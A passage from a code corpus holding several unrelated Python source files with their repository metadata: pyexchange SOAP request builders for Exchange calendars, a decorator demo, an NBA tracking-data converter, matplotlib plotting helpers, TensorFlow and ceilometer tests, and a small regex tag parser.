xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:ItemShape>
<t:BaseShape>{format}</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
<t:RecurringMasterItemId OccurrenceId="{exchange_id}"/>
</m:ItemIds>
</m:GetItem>
"""
root = M.GetItem(
M.ItemShape(
T.BaseShape(format)
),
M.ItemIds(
T.RecurringMasterItemId(OccurrenceId=exchange_id)
)
)
return root
def get_occurrence(exchange_id, instance_index, format=u"Default"):
"""
Requests one or more calendar items from the store matching the master & index.
exchange_id is the id for the master event in the Exchange store.
    format controls how much data you get back from Exchange. Full docs are here, but acceptable values
are IdOnly, Default, and AllProperties.
GetItem Doc:
http://msdn.microsoft.com/en-us/library/aa564509(v=exchg.140).aspx
OccurrenceItemId Doc:
http://msdn.microsoft.com/en-us/library/office/aa580744(v=exchg.150).aspx
<m:GetItem xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:ItemShape>
<t:BaseShape>{format}</t:BaseShape>
</m:ItemShape>
<m:ItemIds>
{% for index in instance_index %}
<t:OccurrenceItemId RecurringMasterId="{exchange_id}" InstanceIndex="{{ index }}"/>
{% endfor %}
</m:ItemIds>
</m:GetItem>
"""
root = M.GetItem(
M.ItemShape(
T.BaseShape(format)
),
M.ItemIds()
)
items_node = root.xpath("//m:ItemIds", namespaces=NAMESPACES)[0]
for index in instance_index:
items_node.append(T.OccurrenceItemId(RecurringMasterId=exchange_id, InstanceIndex=str(index)))
return root
def get_folder(folder_id, format=u"Default"):
id = T.DistinguishedFolderId(Id=folder_id) if folder_id in DISTINGUISHED_IDS else T.FolderId(Id=folder_id)
root = M.GetFolder(
M.FolderShape(
T.BaseShape(format)
),
M.FolderIds(id)
)
return root
def new_folder(folder):
id = T.DistinguishedFolderId(Id=folder.parent_id) if folder.parent_id in DISTINGUISHED_IDS else T.FolderId(Id=folder.parent_id)
if folder.folder_type == u'Folder':
folder_node = T.Folder(T.DisplayName(folder.display_name))
elif folder.folder_type == u'CalendarFolder':
folder_node = T.CalendarFolder(T.DisplayName(folder.display_name))
root = M.CreateFolder(
M.ParentFolderId(id),
M.Folders(folder_node)
)
return root
def find_folder(parent_id, format=u"Default"):
id = T.DistinguishedFolderId(Id=parent_id) if parent_id in DISTINGUISHED_IDS else T.FolderId(Id=parent_id)
root = M.FindFolder(
{u'Traversal': u'Shallow'},
M.FolderShape(
T.BaseShape(format)
),
M.ParentFolderIds(id)
)
return root
def delete_folder(folder):
root = M.DeleteFolder(
{u'DeleteType': 'HardDelete'},
M.FolderIds(
T.FolderId(Id=folder.id)
)
)
return root
def new_event(event):
"""
Requests a new event be created in the store.
http://msdn.microsoft.com/en-us/library/aa564690(v=exchg.140).aspx
<m:CreateItem SendMeetingInvitations="SendToAllAndSaveCopy"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:SavedItemFolderId>
<t:DistinguishedFolderId Id="calendar"/>
</m:SavedItemFolderId>
<m:Items>
<t:CalendarItem>
<t:Subject>{event.subject}</t:Subject>
<t:Body BodyType="HTML">{event.subject}</t:Body>
<t:Start></t:Start>
<t:End></t:End>
<t:Location></t:Location>
<t:RequiredAttendees>
{% for attendee_email in meeting.required_attendees %}
<t:Attendee>
<t:Mailbox>
<t:EmailAddress>{{ attendee_email }}</t:EmailAddress>
</t:Mailbox>
</t:Attendee>
            {% endfor %}
</t:RequiredAttendees>
{% if meeting.optional_attendees %}
<t:OptionalAttendees>
{% for attendee_email in meeting.optional_attendees %}
<t:Attendee>
<t:Mailbox>
<t:EmailAddress>{{ attendee_email }}</t:EmailAddress>
</t:Mailbox>
</t:Attendee>
{% endfor %}
</t:OptionalAttendees>
{% endif %}
{% if meeting.conference_room %}
<t:Resources>
<t:Attendee>
<t:Mailbox>
<t:EmailAddress>{{ meeting.conference_room.email }}</t:EmailAddress>
</t:Mailbox>
</t:Attendee>
</t:Resources>
{% endif %}
</t:CalendarItem>
</m:Items>
</m:CreateItem>
"""
id = T.DistinguishedFolderId(Id=event.calendar_id) if event.calendar_id in DISTINGUISHED_IDS else T.FolderId(Id=event.calendar_id)
start = convert_datetime_to_utc(event.start)
end = convert_datetime_to_utc(event.end)
root = M.CreateItem(
M.SavedItemFolderId(id),
M.Items(
T.CalendarItem(
T.Subject(event.subject),
T.Body(event.body or u'', BodyType="HTML"),
)
),
SendMeetingInvitations="SendToAllAndSaveCopy"
)
calendar_node = root.xpath(u'/m:CreateItem/m:Items/t:CalendarItem', namespaces=NAMESPACES)[0]
if event.reminder_minutes_before_start:
calendar_node.append(T.ReminderIsSet('true'))
calendar_node.append(T.ReminderMinutesBeforeStart(str(event.reminder_minutes_before_start)))
else:
calendar_node.append(T.ReminderIsSet('false'))
calendar_node.append(T.Start(start.strftime(EXCHANGE_DATETIME_FORMAT)))
calendar_node.append(T.End(end.strftime(EXCHANGE_DATETIME_FORMAT)))
if event.is_all_day:
calendar_node.append(T.IsAllDayEvent('true'))
calendar_node.append(T.Location(event.location or u''))
if event.required_attendees:
calendar_node.append(resource_node(element=T.RequiredAttendees(), resources=event.required_attendees))
if event.optional_attendees:
calendar_node.append(resource_node(element=T.OptionalAttendees(), resources=event.optional_attendees))
if event.resources:
calendar_node.append(resource_node(element=T.Resources(), resources=event.resources))
if event.recurrence:
if event.recurrence == u'daily':
recurrence = T.DailyRecurrence(
T.Interval(str(event.recurrence_interval)),
)
elif event.recurrence == u'weekly':
recurrence = T.WeeklyRecurrence(
T.Interval(str(event.recurrence_interval)),
T.DaysOfWeek(event.recurrence_days),
)
elif event.recurrence == u'monthly':
recurrence = T.AbsoluteMonthlyRecurrence(
T.Interval(str(event.recurrence_interval)),
T.DayOfMonth(str(event.start.day)),
)
elif event.recurrence == u'yearly':
recurrence = T.AbsoluteYearlyRecurrence(
T.DayOfMonth(str(event.start.day)),
T.Month(event.start.strftime("%B")),
)
calendar_node.append(
T.Recurrence(
recurrence,
T.EndDateRecurrence(
T.StartDate(event.start.strftime(EXCHANGE_DATE_FORMAT)),
T.EndDate(event.recurrence_end_date.strftime(EXCHANGE_DATE_FORMAT)),
)
)
)
return root
def delete_event(event):
"""
Requests an item be deleted from the store.
<DeleteItem
xmlns="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
DeleteType="HardDelete"
SendMeetingCancellations="SendToAllAndSaveCopy"
AffectedTaskOccurrences="AllOccurrences">
<ItemIds>
<t:ItemId Id="{{ id }}" ChangeKey="{{ change_key }}"/>
</ItemIds>
</DeleteItem>
"""
root = M.DeleteItem(
M.ItemIds(
T.ItemId(Id=event.id, ChangeKey=event.change_key)
),
DeleteType="HardDelete",
SendMeetingCancellations="SendToAllAndSaveCopy",
AffectedTaskOccurrences="AllOccurrences"
)
return root
def move_event(event, folder_id):
id = T.DistinguishedFolderId(Id=folder_id) if folder_id in DISTINGUISHED_IDS else T.FolderId(Id=folder_id)
root = M.MoveItem(
M.ToFolderId(id),
M.ItemIds(
T.ItemId(Id=event.id, ChangeKey=event.change_key)
)
)
return root
def move_folder(folder, folder_id):
id = T.DistinguishedFolderId(Id=folder_id) if folder_id in DISTINGUISHED_IDS else T.FolderId(Id=folder_id)
root = M.MoveFolder(
M.ToFolderId(id),
M.FolderIds(
T.FolderId(Id=folder.id)
)
)
return root
def update_property_node(node_to_insert, field_uri):
""" Helper function - generates a SetItemField which tells Exchange you want to overwrite the contents of a field."""
root = T.SetItemField(
T.FieldURI(FieldURI=field_uri),
T.CalendarItem(node_to_insert)
)
return root
def update_item(event, updated_attributes, calendar_item_update_operation_type):
""" Saves updates to an event in the store. Only request changes for attributes that have actually changed."""
root = M.UpdateItem(
M.ItemChanges(
T.ItemChange(
T.ItemId(Id=event.id, ChangeKey=event.change_key),
T.Updates()
)
),
ConflictResolution=u"AlwaysOverwrite",
MessageDisposition=u"SendAndSaveCopy",
SendMeetingInvitationsOrCancellations=calendar_item_update_operation_type
)
update_node = root.xpath(u'/m:UpdateItem/m:ItemChanges/t:ItemChange/t:Updates', namespaces=NAMESPACES)[0]
# if not send_only_to_changed_attendees:
# # We want to resend invites, which you do by setting an attribute to the same value it has. Right now, events
# # are always scheduled as Busy time, so we just set that again.
# update_node.append(
# update_property_node(field_uri="calendar:LegacyFreeBusyStatus", node_to_insert=T.LegacyFreeBusyStatus("Busy"))
# )
if u'html_body' in updated_attributes:
update_node.append(
update_property_node(field_uri="item:Body", node_to_insert=T.Body(event.html_body, BodyType="HTML"))
)
if u'text_body' in updated_attributes:
update_node.append(
update_property_node(field_uri="item:Body", node_to_insert=T.Body(event.text_body, BodyType="Text"))
)
if u'subject' in updated_attributes:
update_node.append(
update_property_node(field_uri="item:Subject", node_to_insert=T.Subject(event.subject))
)
if u'start' in updated_attributes:
start = convert_datetime_to_utc(event.start)
update_node.append(
update_property_node(field_uri="calendar:Start", node_to_insert=T.Start(start.strftime(EXCHANGE_DATETIME_FORMAT)))
)
if u'end' in updated_attributes:
end = convert_datetime_to_utc(event.end)
update_node.append(
update_property_node(field_uri="calendar:End", node_to_insert=T.End(end.strftime(EXCHANGE_DATETIME_FORMAT)))
)
if u'location' in updated_attributes:
update_node.append(
update_property_node(field_uri="calendar:Location", node_to_insert=T.Location(event.location))
)
if u'online_meeting' in updated_attributes:
print "Not yet Implemented"
pass
if u'attendees' in updated_attributes:
if event.required_attendees:
required = resource_node(element=T.RequiredAttendees(), resources=event.required_attendees)
update_node.append(
update_property_node(field_uri="calendar:RequiredAttendees", node_to_insert=required)
)
else:
update_node.append(delete_field(field_uri="calendar:RequiredAttendees"))
if event.optional_attendees:
optional = resource_node(element=T.OptionalAttendees(), resources=event.optional_attendees)
update_node.append(
update_property_node(field_uri="calendar:OptionalAttendees", node_to_insert=optional)
)
else:
update_node.append(delete_field(field_uri="calendar:OptionalAttendees"))
if u'resources' in updated_attributes:
if event.resources:
resources = resource_node(element=T.Resources(), resources=event.resources)
update_node.append(
update_property_node(field_uri="calendar:Resources", node_to_insert=resources)
)
else:
update_node.append(delete_field(field_uri="calendar:Resources"))
if u'reminder_minutes_before_start' in updated_attributes:
if event.reminder_minutes_before_start:
update_node.append(
update_property_node(field_uri="item:ReminderIsSet", node_to_insert=T.ReminderIsSet('true'))
)
update_node.append(
update_property_node(
field_uri="item:ReminderMinutesBeforeStart",
node_to_insert=T.ReminderMinutesBeforeStart(str(event.reminder_minutes_before_start))
)
)
else:
update_node.append(
update_property_node(field_uri="item:ReminderIsSet", node_to_insert=T.ReminderIsSet('false'))
)
if u'is_all_day' in updated_attributes:
update_node.append(
update_property_node(field_uri="calendar:IsAllDayEvent", node_to_insert=T.IsAllDayEvent(str(event.is_all_day).lower()))
)
for attr in event.RECURRENCE_ATTRIBUTES:
if attr in updated_attributes:
recurrence_node = T.Recurrence()
if event.recurrence == 'daily':
recurrence_node.append(
T.DailyRecurrence(
T.Interval(str(event.recurrence_interval)),
)
)
elif event.recurrence == 'weekly':
recurrence_node.append(
T.WeeklyRecurrence(
T.Interval(str(event.recurrence_interval)),
T.DaysOfWeek(event.recurrence_days),
)
)
elif event.recurrence == 'monthly':
recurrence_node.append(
T.AbsoluteMonthlyRecurrence(
T.Interval(str(event.recurrence_interval)),
T.DayOfMonth(str(event.start.day)),
)
)
elif event.recurrence == 'yearly':
recurrence_node.append(
T.AbsoluteYearlyRecurrence(
T.DayOfMonth(str(event.start.day)),
T.Month(event.start.strftime("%B")),
)
)
recurrence_node.append(
T.EndDateRecurrence(
T.StartDate(event.start.strftime(EXCHANGE_DATE_FORMAT)),
T.EndDate(event.recurrence_end_date.strftime(EXCHANGE_DATE_FORMAT)),
)
)
update_node.append(
update_property_node(field_uri="calendar:Recurrence", node_to_insert=recurrence_node)
)
return root
| {
"content_hash": "95dd76d7d1d8eda603bd58451bdaf11a",
"timestamp": "",
"source": "github",
"line_count": 618,
"max_line_length": 212,
"avg_line_length": 31.0873786407767,
"alnum_prop": 0.6567249635644389,
"repo_name": "jeeftor/alfredToday",
"id": "c95ec305b50d92a1325e14bd62759e4edf6f2a45",
"size": "19212",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/lib/pyexchange/exchange2010/soap_request.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "40171"
},
{
"name": "HTML",
"bytes": "9541"
},
{
"name": "Python",
"bytes": "3016339"
},
{
"name": "Shell",
"bytes": "1057"
},
{
"name": "XSLT",
"bytes": "152770"
}
],
"symlink_target": ""
} |
"""
# decorator_run.py
#
# Copyright(C) by AbsentM. 2018
#
# Author: AbsentM
# Date: 2018/02/10
#
# Description:
# Use decorator function to execute simple run flow.
#
# decorator_run.py == simple_run.py
#
"""
def wrapper(func):
"""
    Define a wrapper function that takes a function as its parameter.
    :param func: The function to wrap
    :return: A new wrapped function
"""
def inner_func(*args, **kwargs):
"""
        A real inner function that runs the wrapped function.
        :param args: positional args passed through
        :param kwargs: keyword args passed through
:return: None
"""
        print "Entering function"
func(*args, **kwargs)
print "Exiting function"
return inner_func
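# Note: the `@wrapper` syntax below is shorthand for re-binding the name
# after definition, i.e. `show_message = wrapper(show_message)`.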
@wrapper
def show_message():
"""
Define a function to show some info msg.
:return: None
"""
print "Hello everyone!"
def decorator_main_run():
"""
Main test function
:return: None
"""
print "----------------------------------"
show_message()
print "----------------------------------"
if __name__ == '__main__':
decorator_main_run() | {
"content_hash": "f43ccfc654f05266249d7c6f60a98835",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 56,
"avg_line_length": 17.666666666666668,
"alnum_prop": 0.5978152929493545,
"repo_name": "absentm/Demo",
"id": "eeb5be6640152f7e3b9365669884b28a63e93be5",
"size": "1023",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python-demo/decorator-demo/decorator_run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "5500"
},
{
"name": "Go",
"bytes": "76"
},
{
"name": "HTML",
"bytes": "16708"
},
{
"name": "Java",
"bytes": "294904"
},
{
"name": "JavaScript",
"bytes": "24993"
},
{
"name": "Python",
"bytes": "73632"
},
{
"name": "Shell",
"bytes": "15108"
},
{
"name": "Vue",
"bytes": "6943"
}
],
"symlink_target": ""
} |
import pandas
import os
import sys
import json
import movement.config as CONFIG
data_path = CONFIG.data.dir
csv_path = CONFIG.data.movement.dir
files = os.listdir(data_path)
if not os.path.exists(csv_path):
os.makedirs(csv_path)
count = 0
movement_headers = ["team_id", "player_id", "x_loc", "y_loc", "radius", "game_clock", "shot_clock", "quarter", "game_id",
"event_id"]
for file in files:
if '.json' not in file:
continue
try:
count = count + 1
file_data = open('%s/%s' % (data_path, file))
game_id = file.replace('.json', '')
data = json.load(file_data)
events = data['events']
moments = []
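        # Layout of each moment (an inference from the indexing below,
        # not documented in the source): moment[0] -> quarter,
        # moment[2] -> game clock, moment[3] -> shot clock, and
        # moment[5] -> list of player rows, where each player row is
        # [team_id, player_id, x_loc, y_loc, radius].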
for event in events:
event_id = event['eventId']
movement_data = event['moments']
for moment in movement_data:
for player in moment[5]:
player.extend((moment[2], moment[3], moment[0], game_id, event_id))
moments.append(player)
# movement frame is complete for game
movement = pandas.DataFrame(moments, columns=movement_headers)
movement.to_csv('%s/%s.csv' % (csv_path, game_id), index=False)
# movement.to_json('./data/json/' + game_id + '.json', orient='records')
print '\n'
print '\n'
print 'Finished collecting dataframe for Game ID: ' + game_id
print 'Completed : ' + str(count) + ' games.'
except Exception as e:
print 'Error in loading: ' + str(file) + ' file, Error: ' + str(e)
print '\n'
print '\n'
print 'Finished collecting dataframes for all games.'
print str(count) + ' games counted'
| {
"content_hash": "48b3c36efc3a26bf0615edf9ba386909",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 121,
"avg_line_length": 32,
"alnum_prop": 0.5793269230769231,
"repo_name": "sealneaward/nba-movement-data",
"id": "2d717e6348e6f973518177e9aeee9c14a309889f",
"size": "1664",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "movement/json_to_csv.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14593"
},
{
"name": "Shell",
"bytes": "78"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function
import six
import numpy as np
import copy
import matplotlib.cm as mcm
from matplotlib.collections import LineCollection
from matplotlib.colors import ListedColormap, BoundaryNorm
from matplotlib.ticker import NullLocator
def mark_region(ax, low, high, vline_style, span_style):
"""
Mark a region of a graph with vertical lines and an axvspan
Parameters
----------
ax : Axes
The `Axes` object to add the artist too
low, high : float
        The low and high threshold values; a vertical line is drawn at
        each value and the region between them is shaded with an axvspan
vline_style : dict, optional
The style to use for the vertical lines
    span_style : dict, optional
Style for axvspan behind central region
Returns
-------
vline_low, vline_hi : Line2D
Vertical lines at the thresholds
hspan : Patch
Patch over middle region
"""
# add vertical lines
vline_low = ax.axvline(low, **vline_style)
vline_high = ax.axvline(high, **vline_style)
hspan = ax.axvspan(low, high, **span_style)
return vline_low, vline_high, hspan
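# Illustrative usage (a sketch, not part of the original module); the
# style dicts are arbitrary examples and `ax` is a Matplotlib Axes.
#
#   >>> import matplotlib.pyplot as plt
#   >>> fig, ax = plt.subplots()
#   >>> mark_region(ax, 2.0, 5.0,
#   ...             vline_style={'color': 'k', 'ls': '--'},
#   ...             span_style={'color': '0.8', 'alpha': 0.5})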
def split_plot(ax, x, y, low, high, inner_style, outer_style):
"""
Split styling of line based on the x-value
Parameters
----------
ax : Axes
The `Axes` object to add the artist too
x, y : ndarray
Data, must be same length
low, high : float
The low and high threshold values, points for `low < x < high` are
styled using `inner_style` and points for `x < low or x > high` are
styled using `outer_style`
inner_style, outer_style : dict
Dictionary of styles that can be passed to `ax.plot`
Returns
-------
lower, mid, upper : Line2D
        The artists for the lower, middle, and upper ranges
"""
low_mask = x < low
high_mask = x > high
mid_mask = ~np.logical_or(low_mask, high_mask)
low_mask[1:] |= low_mask[:-1]
high_mask[:-1] |= high_mask[1:]
lower, = ax.plot(x[low_mask], y[low_mask], **outer_style)
mid, = ax.plot(x[mid_mask], y[mid_mask], **inner_style)
upper, = ax.plot(x[high_mask], y[high_mask], **outer_style)
return lower, mid, upper
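# Illustrative usage (a sketch, not part of the original module),
# continuing the `ax` from the sketch above: style the central band
# differently from the tails.
#
#   >>> x = np.linspace(0, 10, 200)
#   >>> split_plot(ax, x, np.sin(x), low=3, high=7,
#   ...            inner_style={'color': 'r'}, outer_style={'color': 'b'})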
def show_label_array(ax, label_array, cmap=None, **kwargs):
"""
Display a labeled array nicely
Additional kwargs are passed through to `ax.imshow`.
If `vmin` is in kwargs, it is clipped to minimum of 0.5.
Parameters
----------
ax : Axes
The `Axes` object to add the artist too
label_array : ndarray
Expected to be an unsigned integer array. 0 is background,
        positive integers label regions of interest
cmap : str or colormap, optional
Color map to use, defaults to 'Paired'
Returns
-------
img : AxesImage
The artist added to the axes
"""
if cmap is None:
cmap = 'Paired'
    _cmap = copy.copy(mcm.get_cmap(cmap))
_cmap.set_under('w', 0)
vmin = max(.5, kwargs.pop('vmin', .5))
ax.set_aspect('equal')
im = ax.imshow(label_array, cmap=_cmap,
interpolation='nearest',
vmin=vmin,
**kwargs)
return im
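# Illustrative usage (a sketch, not part of the original module): display
# a small labeled array with the 0 background rendered as white.
#
#   >>> labels = np.zeros((5, 5), dtype=np.uint8)
#   >>> labels[1:3, 1:3] = 1
#   >>> im = show_label_array(ax, labels)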
def binary_state_lines(ax, data, xmin, xmax,
delta_y=3,
off_color=None,
on_color=None,
lc_kwargs=None):
"""
Draw series of lines indicating the state of (many) indicators.
Parameters
----------
ax : Axes
The axes to draw stuff to
data : OrderedDict
The data as an ordered dict. The keys will be used as ytick labels
keyed on the data label. The values are a list of edge pairs where
the value is 'high'; ex ``data[k] = [(1, 2), (3, 5.5)]`` is 'high' in
the ranges 1 to 2 and 3 to 5.5 and 'low' everywhere else.
The lines are drawn in order from the top down.
xmin, xmax : float
The minimum and maximum limits for the x values
delta_y : float, optional
The spacing between lines
off_color, on_color : color, optional
        The colors to use for the off/on state.
Default to "#1C2F4D" (blueish) and "#FA9B00" (yellowish) respectively
lc_kwargs : dict, optional
        kwargs to pass through to the LineCollection init method. If not
given defaults to ``{'lw': 10}``
Returns
-------
ret : dict
dictionary of the collections added keyed on the label
"""
if lc_kwargs is None:
lc_kwargs = dict()
if 'lw' not in lc_kwargs:
lc_kwargs['lw'] = 10
if off_color is None:
off_color = "#1C2F4D"
if on_color is None:
on_color = "#FA9B00"
# base offset
y_val = 0
# make the color map and norm
cmap = ListedColormap([off_color, on_color])
norm = BoundaryNorm([0, 0.5, 1], cmap.N)
# dictionary to hold the returned artists
ret = dict()
# loop over the input data draw each collection
for label, d in data.items():
# increment the y offset
y_val += delta_y
        # turn the high windows into alternating
        # high/low regions
x = np.asarray(d).ravel()
# assign the high/low state to each one
state = np.mod(1 + np.arange(len(x)), 2)
# deal with boundary conditions to be off
# at start/end
if x[0] > xmin:
x = np.r_[xmin, x]
state = np.r_[0, state]
if x[-1] < xmax:
x = np.r_[x, xmax]
state = np.r_[state, 0]
# make the matching y values
y = np.ones(len(x)) * y_val
# call helper function to create the collection
coll = _draw_segments(ax, x, y, state,
cmap, norm, lc_kwargs)
ret[label] = coll
# set up the axes limits
ax.set_xlim(xmin, xmax)
ax.set_ylim(0, y_val + delta_y)
# turn off x-ticks
ax.xaxis.set_major_locator(NullLocator())
# make the y-ticks be labeled as per the input
ax.yaxis.set_ticks((1 + np.arange(len(data))) * delta_y)
ax.yaxis.set_ticklabels(list(data.keys()))
# invert so that the first data is at the top
ax.invert_yaxis()
# turn off the frame and patch
ax.set_frame_on(False)
# return the added artists
return ret
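# Illustrative usage (a sketch, not part of the original module): two
# indicators whose 'high' windows are given as edge pairs.
#
#   >>> from collections import OrderedDict
#   >>> data = OrderedDict([('shutter', [(1, 2), (3, 5.5)]),
#   ...                     ('beam', [(0.5, 4)])])
#   >>> arts = binary_state_lines(ax, data, xmin=0, xmax=6)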
def _draw_segments(ax, x, y, state, cmap, norm, lc_kwargs):
"""
    Helper function to turn boundary edges into the segment input that
    LineCollection expects.
Parameters
----------
ax : Axes
The axes to draw to
x, y, state : array
The x edges, the y values and the state of each region
cmap : matplotlib.colors.Colormap
The color map to use
norm : matplotlib.ticker.Norm
The norm to use with the color map
lc_kwargs : dict
kwargs to pass through to LineCollection
"""
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
lc = LineCollection(segments, cmap=cmap, norm=norm, **lc_kwargs)
lc.set_array(state)
ax.add_collection(lc)
return lc
| {
"content_hash": "153447e0a94151bb9b0edfa9feb38074",
"timestamp": "",
"source": "github",
"line_count": 259,
"max_line_length": 77,
"avg_line_length": 27.83783783783784,
"alnum_prop": 0.591123439667129,
"repo_name": "sameera2004/xray-vision",
"id": "090deaf1561b9cbb45cea0af6f88db19e5bb6cf7",
"size": "7210",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "xray_vision/mpl_plotting/misc.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "315279"
},
{
"name": "Shell",
"bytes": "39"
}
],
"symlink_target": ""
} |
"""Tests for `tf.data.experimental.assert_cardinality()`."""
from absl.testing import parameterized
from tensorflow.python.data.experimental.ops import cardinality
from tensorflow.python.data.kernel_tests import checkpoint_test_base
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.framework import combinations
from tensorflow.python.framework import errors
from tensorflow.python.platform import test
class AssertCardinalityTest(test_base.DatasetTestBase, parameterized.TestCase):
"""Tests for `tf.data.experimental.assert_cardinality()`."""
@combinations.generate(test_base.default_test_combinations())
def testCorrectCardinality(self):
dataset = dataset_ops.Dataset.range(10).filter(lambda x: True)
self.assertEqual(
self.evaluate(cardinality.cardinality(dataset)), cardinality.UNKNOWN)
self.assertDatasetProduces(dataset, expected_output=range(10))
dataset = dataset.apply(cardinality.assert_cardinality(10))
self.assertEqual(self.evaluate(cardinality.cardinality(dataset)), 10)
self.assertDatasetProduces(dataset, expected_output=range(10))
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
num_elements=10,
asserted_cardinality=20,
expected_error="Input dataset was expected to contain 20 "
"elements but contained only 10 elements.") +
combinations.combine(
num_elements=1,
asserted_cardinality=20,
expected_error="Input dataset was expected to contain 20 "
"elements but contained only 1 element.") +
combinations.combine(
num_elements=10,
asserted_cardinality=cardinality.INFINITE,
expected_error="Input dataset was expected to contain an "
"infinite number of elements but contained only 10 elements.") +
combinations.combine(
num_elements=1,
asserted_cardinality=cardinality.INFINITE,
expected_error="Input dataset was expected to contain an "
"infinite number of elements but contained only 1 element.") +
combinations.combine(
num_elements=10,
asserted_cardinality=5,
expected_error="Input dataset was expected to contain 5 "
"elements but contained at least 6 elements.") +
combinations.combine(
num_elements=10,
asserted_cardinality=1,
expected_error="Input dataset was expected to contain 1 "
"element but contained at least 2 elements.")))
def testIncorrectCardinality(self, num_elements, asserted_cardinality,
expected_error):
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.apply(
cardinality.assert_cardinality(asserted_cardinality))
get_next = self.getNext(dataset)
with self.assertRaisesRegex(errors.FailedPreconditionError, expected_error):
while True:
self.evaluate(get_next())
class AssertCardinalityCheckpointTest(checkpoint_test_base.CheckpointTestBase,
parameterized.TestCase):
def build_dataset(self, num_elements, options=None):
dataset = dataset_ops.Dataset.range(num_elements).apply(
cardinality.assert_cardinality(num_elements))
if options:
dataset = dataset.with_options(options)
return dataset
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations(),
combinations.combine(symbolic_checkpoint=[False, True])))
def test(self, verify_fn, symbolic_checkpoint):
options = options_lib.Options()
options.experimental_symbolic_checkpoint = symbolic_checkpoint
verify_fn(self, lambda: self.build_dataset(200, options), num_outputs=200)
if __name__ == "__main__":
test.main()
| {
"content_hash": "5ec993335507c653cb5ceb8efe134a57",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 80,
"avg_line_length": 44.645161290322584,
"alnum_prop": 0.683766859344894,
"repo_name": "paolodedios/tensorflow",
"id": "1a226418c476f88ccf41db32e510194ffdfa3a93",
"size": "4841",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/python/data/experimental/kernel_tests/assert_cardinality_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "36962"
},
{
"name": "C",
"bytes": "1387968"
},
{
"name": "C#",
"bytes": "13584"
},
{
"name": "C++",
"bytes": "125994873"
},
{
"name": "CMake",
"bytes": "182324"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "416133"
},
{
"name": "Go",
"bytes": "2129888"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1074438"
},
{
"name": "Jupyter Notebook",
"bytes": "792906"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "11402294"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "172666"
},
{
"name": "Objective-C++",
"bytes": "300208"
},
{
"name": "Pawn",
"bytes": "5552"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "42775737"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "9199"
},
{
"name": "Shell",
"bytes": "621520"
},
{
"name": "Smarty",
"bytes": "89545"
},
{
"name": "SourcePawn",
"bytes": "14625"
},
{
"name": "Starlark",
"bytes": "7727119"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
"""Tests for ceilometer/central/manager.py
"""
import mock
from ceilometer.central import manager
from ceilometer.openstack.common.fixture import mockpatch
from ceilometer.openstack.common import test
from ceilometer.tests import agentbase
class TestManager(test.BaseTestCase):
@mock.patch('ceilometer.pipeline.setup_pipeline', mock.MagicMock())
def test_load_plugins(self):
mgr = manager.AgentManager()
self.assertIsNotNone(list(mgr.pollster_manager))
class TestRunTasks(agentbase.BaseAgentManagerTestCase):
def setup_manager(self):
self.mgr = manager.AgentManager()
def setUp(self):
super(TestRunTasks, self).setUp()
self.useFixture(mockpatch.Patch(
'keystoneclient.v2_0.client.Client',
return_value=None))
| {
"content_hash": "58fb7f587c745dab92c74e91381c7189",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 71,
"avg_line_length": 27.517241379310345,
"alnum_prop": 0.7230576441102757,
"repo_name": "rackerlabs/instrumented-ceilometer",
"id": "573c73aebb5d177b4ad8add8d6b9997a6b41f812",
"size": "1451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ceilometer/tests/central/test_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "149656"
},
{
"name": "JavaScript",
"bytes": "361114"
},
{
"name": "Python",
"bytes": "1897887"
},
{
"name": "Shell",
"bytes": "1322"
}
],
"symlink_target": ""
} |
import re
NATION_REGEX = re.compile("@@([^@]{0,40})@@")
REGION_REGEX = re.compile("%%([^%]{0,40})%%")
def parse_nation(s):
"""Accepts a string, and outputs the nations referenced
if it can find them"""
return NATION_REGEX.findall(s)
def parse_region(s):
"""Accepts a string, and outputs the regions referenced
if it can find them"""
return REGION_REGEX.findall(s)
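# Illustrative usage (a sketch, not part of the original module); the
# nation and region names are arbitrary examples.
#
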